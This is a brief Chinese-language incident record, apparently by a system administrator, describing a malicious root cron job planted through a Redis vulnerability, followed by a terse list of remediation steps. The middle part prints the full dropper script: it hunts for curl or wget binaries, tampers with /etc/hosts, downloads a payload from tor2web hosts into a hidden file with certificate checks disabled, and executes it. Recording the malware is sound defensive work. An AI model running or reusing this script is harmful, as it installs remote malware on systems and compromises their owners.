位置: /var/spool/cron/root
侵入方式:Redis漏洞
Shell脚本
(
tbin=$(command -v passwd)
bpath=$(dirname "${tbin}")
curl="curl"
if [ $(curl --version 2>/dev/null | grep "curl " | wc -l) -eq 0 ]; then
curl="echo"
if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null | grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi
fi
wget="wget"
if [ $(wget --version 2>/dev/null | grep "wgetrc " | wc -l) -eq 0 ]; then
wget="echo"
if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null | grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi
fi
if [ $(cat /etc/hosts | grep -i ".onion." | wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" >/etc/hosts >/dev/null 2>&1; fi
${curl} -fsSLk --max-time 40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -o ~/.ntp || ${curl} -fsSLk --max-time 40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -o ~/.ntp || ${curl} -fsSLk --max-time 40 https://xyxg3xqckmqy2wbp.tor2web.io/src/ldm3 -o ~/.ntp || wget --quiet --no-check-certificate --timeout=40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -O ~/.ntp || wget --quiet --no-check-certificate --timeout=40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -O ~/.ntp || wget --quiet --no-check-certificate --timeout=40 https://xyxg3xqckmqy2wbp.tor2web.io/src/ldm3 -O ~/.ntp
) && chmod +x ~/.ntp && sh ~/.ntp
处理方式:
1、常用对外端口已关闭
2、各种黑名单和限行处理
3、不可描述的遗留处理